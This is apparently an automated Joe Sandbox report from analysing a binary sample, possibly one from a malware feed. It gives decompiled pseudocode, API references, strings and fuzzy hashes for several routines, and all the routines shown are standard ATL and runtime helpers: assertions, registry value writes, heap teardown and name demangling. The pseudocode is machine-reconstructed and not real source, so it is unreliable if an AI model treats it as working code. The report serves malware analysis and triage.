                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h$__atl_condVal
                      • API String ID: 2478291497-1071720693
                      • Opcode ID: aec46dad4ca8b1b2375a269fc24e6e24c8d0b154e16a51f4cb7ec997e3d21667
                      • Instruction ID: 388019e2e9e8fb7c003f3b49a1ae8f86f83b10bab54cdeecd06d1b4c6616fede
                      • Opcode Fuzzy Hash: aec46dad4ca8b1b2375a269fc24e6e24c8d0b154e16a51f4cb7ec997e3d21667
                      • Instruction Fuzzy Hash: 32411B74E44209EFDB14DF98C985FADB7B5BF88304F2081A9E515A7381D7719E80DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00947E70(void* __ecx, intOrPtr* __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v20;
                      				signed int _v32;
                      				char _v44;
                      				signed int _v52;
                      				void* _t32;
                      				intOrPtr _t33;
                      				void* _t35;
                      				void* _t45;
                      				void* _t46;
                      				intOrPtr _t50;
                      				intOrPtr* _t61;
                      				void* _t67;
                      				void* _t68;
                      				void* _t69;
                      				void* _t70;
                      				void* _t71;
                      				void* _t72;
                      
                      				_t61 = __edx;
                      				_push(__ecx);
                      				_t67 =  &_v52;
                      				memset(_t67, 0xcccccccc, 0xc << 2);
                      				_t72 = _t71 + 0xc;
                      				_t68 = _t67 + 0xc;
                      				_pop(_t50);
                      				_v8 = _t50;
                      				if(_a4 == 0) {
                      					L2:
                      					_t32 = L00994930(_t75, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x115, 0, "%ls", L"pOps != 0 && rgStrings != 0");
                      					_t72 = _t72 + 0x18;
                      					if(_t32 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(_a4 == 0 || _a8 == 0) {
                      						_t33 = 0x80070057;
                      						L17:
                      						_push(_t61);
                      						E009D14C0(_t70, 0x947fa4);
                      						_t35 = _t33;
                      						return E009D1520(_t35, _t70 - _t72 + 0x30);
                      					} else {
                      						_v12 = 0;
                      						while(1) {
                      							__eflags = _v12;
                      							if(_v12 < 0) {
                      								break;
                      							}
                      							__eflags =  *_a4;
                      							if( *_a4 == 0) {
                      								break;
                      							}
                      							_t61 = _a4;
                      							E0094A0F0(_v8,  *_t61,  &_v20,  &_v32,  &_v44);
                      							__eflags = _v20 - 7;
                      							if(_v20 == 7) {
                      								_v52 = _v32 | 0x80000000;
                      								_a4 = _a4 + 4;
                      								_t61 = _a8;
                      								_v12 = E009486D0(_t46, _v8, _t68, _t69, _v52,  &_a4, _t61, _a12, _a16, _a20);
                      								continue;
                      							}
                      							__eflags = 0;
                      							if(0 == 0) {
                      								_t45 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x122, 0, "%ls", 0x9f40dc);
                      								_t72 = _t72 + 0x18;
                      								__eflags = _t45 - 1;
                      								if(_t45 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							_t33 = 0x80004005;
                      							goto L17;
                      						}
                      						_t33 = _v12;
                      						goto L17;
                      					}
                      				}
                      				_t75 = _a8;
                      				if(_a8 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}























                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00947F8A
                      Strings
                      • %ls, xrefs: 00947E9C, 00947F19
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00947EA8, 00947F25
                      • pOps != 0 && rgStrings != 0, xrefs: 00947E97
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$pOps != 0 && rgStrings != 0
                      • API String ID: 930174750-939455025
                      • Opcode ID: 952cea56c050617cfda45d6e14c5e00a4cdaf3ea876dcdd36f057e615848e050
                      • Instruction ID: 7a5ab9742a840651e2c6605a31ac476287c9bfcfc84ed1c3a1170ceb2fba2ab1
                      • Opcode Fuzzy Hash: 952cea56c050617cfda45d6e14c5e00a4cdaf3ea876dcdd36f057e615848e050
                      • Instruction Fuzzy Hash: 2731D471A0420CFBDB14DFC8DC56FEFB7B8AB84304F108559F609AA291D7749A84CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00941900(void* __eflags, intOrPtr _a4) {
                      				char _v8;
                      				signed int _v12;
                      				char _v20;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				char _v37;
                      				char _v52;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				char _v76;
                      				intOrPtr _v84;
                      				char _v88;
                      				void _v92;
                      				void* _v108;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t38;
                      				signed int _t39;
                      				intOrPtr _t42;
                      				void* _t49;
                      				void* _t52;
                      				void* _t53;
                      				intOrPtr _t66;
                      				void* _t68;
                      				void* _t72;
                      				void* _t74;
                      				signed int _t75;
                      				void* _t76;
                      				intOrPtr _t78;
                      				char _t79;
                      
                      				_push(0xfffffffe);
                      				_push(0xa02e58);
                      				_push(E00959CD0);
                      				_push( *[fs:0x0]);
                      				_push(_t52);
                      				memset( &_v92, 0xcccccccc, 0x10 << 2);
                      				_t78 = _t76 + 0xffffffffffffffc4;
                      				_t38 =  *0xa0600c; // 0x5d529087
                      				_v12 = _v12 ^ _t38;
                      				_t39 = _t38 ^ _t75;
                      				_v32 = _t39;
                      				_push(_t39);
                      				 *[fs:0x0] =  &_v20;
                      				_v28 = _t78;
                      				_v76 = 0;
                      				_v37 = 1;
                      				_v8 = 0;
                      				_v52 = 0;
                      				_t42 = E009516D0(_a4,  &_v52,  &_v52, _a4, 0x2000);
                      				_t79 = _t78 + 0xc;
                      				_v60 = _t42;
                      				if(_v60 >= 0) {
                      					_v84 = _v52 + 0x24;
                      					E009CF1D0(_v84);
                      					_v88 = _t79;
                      					_v28 = _t79;
                      					_t66 = _v84;
                      					E009D13A0(_v88, _t66,  &_v76);
                      					_t25 =  &_v88;
                      					 *_t25 = _v88 + 0x20;
                      					__eflags =  *_t25;
                      					_v64 = _v88;
                      				} else {
                      					_t66 = 0;
                      					if(0 == 0 && L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlalloc.h", 0x272, 0, ?str?, 0x9f40dc) == 1) {
                      						asm("int3");
                      					}
                      					_v37 = 0;
                      				}
                      				_v8 = 0xfffffffe;
                      				_push(_v37);
                      				E009D13E0(_t52, _t75, 0x941a58, _v76);
                      				_pop(_t49);
                      				_t68 = _t66;
                      				 *[fs:0x0] = _v20;
                      				_pop(_t72);
                      				_pop(_t74);
                      				_pop(_t53);
                      				return E00957280(_t49, _t53, _v32 ^ _t75, _t68, _t72, _t74);
                      			}



































                      APIs
                        • Part of subcall function 009516D0: _HRESULT_FROM_WIN32.LIBCMTD ref: 009516E3
                      • @_RTC_AllocaHelper@12.LIBCMT ref: 009419CD
                      Strings
                      • %ls, xrefs: 00941985
                      • , xrefs: 009419D2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h, xrefs: 00941991
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AllocaHelper@12
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h
                      • API String ID: 1877400981-3363187302
                      • Opcode ID: e12d1dd742ed6ff40f5c3c9137b6354facf16a47904a5ef832dff0a279d7f391
                      • Instruction ID: e51df4b2e01b1f94233d8558fe675f4d6e2d865411e3a30863061b07f20b9c9f
                      • Opcode Fuzzy Hash: e12d1dd742ed6ff40f5c3c9137b6354facf16a47904a5ef832dff0a279d7f391
                      • Instruction Fuzzy Hash: 7F319C76E4434CAFDB10CFD8EC52BEEBBB5FB88714F104229E502AB281D77519498B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E009CFE00(void* __esi, WCHAR* _a4) {
                      				intOrPtr _v8;
                      				WCHAR* _v12;
                      				WCHAR* _v16;
                      				signed int _t24;
                      				signed int _t25;
                      				WCHAR* _t27;
                      				void* _t32;
                      				void* _t44;
                      				void* _t45;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_t47 = _a4;
                      				if(_a4 == 0) {
                      					_t32 = L00994930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1ca2, 0, L"%ls", L"lpszPathName != 0");
                      					_t45 = _t45 + 0x18;
                      					if(_t32 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 != 0) {
                      					_v8 = _a4;
                      					_v12 = _a4;
                      					while(1) {
                      						__eflags =  *_v12 & 0x0000ffff;
                      						if(( *_v12 & 0x0000ffff) == 0) {
                      							break;
                      						}
                      						_t27 = CharNextW(_v12);
                      						__eflags = _t45 - _t45;
                      						_v16 = E009D1520(_t27, _t45 - _t45);
                      						__eflags = ( *_v12 & 0x0000ffff) - 0x5c;
                      						if(( *_v12 & 0x0000ffff) == 0x5c) {
                      							L10:
                      							_v8 = _v16;
                      							L11:
                      							_v12 = _v16;
                      							continue;
                      						}
                      						__eflags = ( *_v12 & 0x0000ffff) - 0x2f;
                      						if(( *_v12 & 0x0000ffff) == 0x2f) {
                      							goto L10;
                      						}
                      						__eflags = ( *_v12 & 0x0000ffff) - 0x3a;
                      						if(( *_v12 & 0x0000ffff) != 0x3a) {
                      							goto L11;
                      						}
                      						goto L10;
                      					}
                      					_t24 = _v8 - _a4;
                      					__eflags = _t24;
                      					_t25 = _t24 >> 1;
                      					goto L13;
                      				} else {
                      					_t25 = 0;
                      					L13:
                      					return E009D1520(_t25, _t44 - _t45 + 0xc);
                      				}
                      			}












                      APIs
                      • CharNextW.USER32(00000000), ref: 009CFE6E
                      Strings
                      • lpszPathName != 0, xrefs: 009CFE22
                      • %ls, xrefs: 009CFE27
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009CFE33
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CharNext
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$lpszPathName != 0
                      • API String ID: 3213498283-4001971154
                      • Opcode ID: a7711924e0593b9dd062f895b2a90ca0c0d43bfa619be3084d4780b4a4e4670f
                      • Instruction ID: ceb8d49482d4117df2d2792e5283d6d003d42236ce0abe348f88005c2014685f
                      • Opcode Fuzzy Hash: a7711924e0593b9dd062f895b2a90ca0c0d43bfa619be3084d4780b4a4e4670f
                      • Instruction Fuzzy Hash: 0F219031E40208AFCB10DF8DD491FADBBB6EF44710F1081AEE805AB391D6749B80CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00946790(intOrPtr __ecx, void* __esi) {
                      				intOrPtr* _v8;
                      				intOrPtr* _v12;
                      				void* _t23;
                      				void* _t24;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t13 = _v8;
                      				 *_v8 = 0xa00190;
                      				if(( *(_v8 + 8) & 0x000000ff) != 0) {
                      					_t13 = _v8;
                      					if( *(_v8 + 4) != 0) {
                      						_v12 = E009D1520(HeapDestroy( *(_v8 + 4)), _t24 - _t24);
                      						_t29 = _v12;
                      						if(_v12 == 0) {
                      							_t13 = L00994930(_t29, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x74, 0, "%ls", L"bSuccess");
                      							_t24 = _t24 + 0x18;
                      							if(_t13 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					}
                      				}
                      				return E009D1520(_t13, _t23 - _t24 + 8);
                      			}







                      APIs
                      Strings
                      • %ls, xrefs: 009467E9
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 009467F2
                      • bSuccess, xrefs: 009467E4
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DestroyHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 2435110975-1732559737
                      • Opcode ID: bf9d787a647f03400cae22f5fdfb51eaca15f7cf013dd72a95d98402e5e068ac
                      • Instruction ID: 736974b46098747611c868b1326051d8e174f94acb5f4c2b065b5c9c1ec4a9c5
                      • Opcode Fuzzy Hash: bf9d787a647f03400cae22f5fdfb51eaca15f7cf013dd72a95d98402e5e068ac
                      • Instruction Fuzzy Hash: 3001F7B1E44208EFCB10DB9CD842F6DBBB49F8170CF248599E90427381D7719E40CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 35%
                      			E00944740(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
                      				void** _v8;
                      				void* _t14;
                      				void* _t23;
                      				void* _t24;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t26 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t14 = L00994930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x185e, 0, "%ls", L"m_hKey != 0");
                      						_t24 = _t24 + 0x18;
                      						if(_t14 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				return E009D1520(E009D1520(RegSetValueExA( *_v8, _a4, 0, 3, _a8, _a12), _t24 - _t24), _t23 - _t24 + 4);
                      			}







                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00944799
                      Strings
                      • %ls, xrefs: 0094475C
                      • m_hKey != 0, xrefs: 00944757
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00944768
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: dfd0e9f8c4f7721f651ee3673bf54fb2d5fb3e3e1c15fc09d845a2eca983af9a
                      • Instruction ID: a50c2705bcc753197c27290cf716352c68f3e6087a47d4f3df4910d47991d34e
                      • Opcode Fuzzy Hash: dfd0e9f8c4f7721f651ee3673bf54fb2d5fb3e3e1c15fc09d845a2eca983af9a
                      • Instruction Fuzzy Hash: 3301A472E80208BFDB24EB88DC43FAE73699B95714F108159F604AB281E7B1AE5087D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 35%
                      			E009447C0(void** __ecx, void* __esi, char* _a4, char _a8) {
                      				void** _v8;
                      				void* _t13;
                      				void* _t21;
                      				void* _t22;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t24 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t13 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1866, 0, "%ls", L"m_hKey != 0");
                      						_t22 = _t22 + 0x18;
                      						if(_t13 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				return E009D1520(E009D1520(RegSetValueExA( *_v8, _a4, 0, 4,  &_a8, 4), _t22 - _t22), _t21 - _t22 + 4);
                      			}







                      APIs
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00944817
                      Strings
                      • %ls, xrefs: 009447DC
                      • m_hKey != 0, xrefs: 009447D7
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009447E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_hKey != 0
                      • API String ID: 3702945584-645619241
                      • Opcode ID: f13b20bce8d99a96126cb0e227c16ce03b914f1cb461c3d4080276ea300b08a0
                      • Instruction ID: c46bfb89279a5a7f28dfc79a40e7ff9f63ff06f32a264379eadffc04189ce1ab
                      • Opcode Fuzzy Hash: f13b20bce8d99a96126cb0e227c16ce03b914f1cb461c3d4080276ea300b08a0
                      • Instruction Fuzzy Hash: 9EF06871E84208BBDB10EB88DC43FAE735D9B51754F108155F705AB2C1E6B55E4087D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 28%
                      			E00943430(void* __esi, intOrPtr _a4) {
                      				intOrPtr _t9;
                      				void* _t12;
                      				void* _t14;
                      				void* _t21;
                      				void* _t22;
                      
                      				do {
                      					_t9 = _a4;
                      					_t23 =  *((intOrPtr*)(_t9 + 0x10));
                      					if( *((intOrPtr*)(_t9 + 0x10)) == 0) {
                      						_t14 = L00994930(_t23, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xf0, 0, "%ls", L"pCache != 0");
                      						_t22 = _t22 + 0x18;
                      						if(_t14 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)) != 0) {
                      					__imp__CoRevokeClassObject( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 4)));
                      					__eflags = _t22 - _t22;
                      					_t12 = E009D1520( *((intOrPtr*)(_a4 + 0x10)), __eflags);
                      				} else {
                      					_t12 = 0;
                      				}
                      				return E009D1520(_t12, _t21 - _t22);
                      			}








                      APIs
                      • CoRevokeClassObject.OLE32(?), ref: 00943483
                      Strings
                      • %ls, xrefs: 00943442
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094344E
                      • pCache != 0, xrefs: 0094343D
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ClassObjectRevoke
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1224902704-3984120347
                      • Opcode ID: 7d53f75518d55cd164db19e0b072ef0bb4b72b2d16dddc36c580c155e9d7bacb
                      • Instruction ID: 26181c3f3d9fff4ce579a5d83c6c91ad5e4359217e95bafebc3e9454eb2ba425
                      • Opcode Fuzzy Hash: 7d53f75518d55cd164db19e0b072ef0bb4b72b2d16dddc36c580c155e9d7bacb
                      • Instruction Fuzzy Hash: F2F08B316803086FC720EF28D842FB97349AB80304F40C400F5054B2A3D778EE81CBC1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00969C10(intOrPtr _a4) {
                      				char _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				intOrPtr* _t13;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      
                      				_t13 =  *0xb30640; // 0x0
                      				_v8 =  *_t13;
                      				if(_v8 == 0) {
                      					E0095F350(_a4, 1);
                      					return _a4;
                      				}
                      				if(_v8 == 0x41) {
                      					_t26 =  *0xb30640; // 0x0
                      					_t27 = _t26 + 1;
                      					 *0xb30640 = _t27;
                      					_v16 = E00960060("{flat}", 6);
                      					_v12 = _t27;
                      					E0095F1F0(_a4,  &_v16);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 2);
                      				return _a4;
                      			}









                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00969C68
                      • DName::DName.LIBVCRUNTIMED ref: 00969C77
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A${flat}
                      • API String ID: 3739413223-2440177573
                      • Opcode ID: acecbd3b21e9629cdc38db1043d2db1d96ccb3cd3cad549d96a7ba02ff4e980a
                      • Instruction ID: 0afe961bf85572637359f0b30ab0dd9ff0871ef9b519cd7fa927b6bd57f2185d
                      • Opcode Fuzzy Hash: acecbd3b21e9629cdc38db1043d2db1d96ccb3cd3cad549d96a7ba02ff4e980a
                      • Instruction Fuzzy Hash: E5016270944248AFDB04EF68C892B9D3BF8AFC0344F1480A5E88E5F391C6756A54D780
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 64%
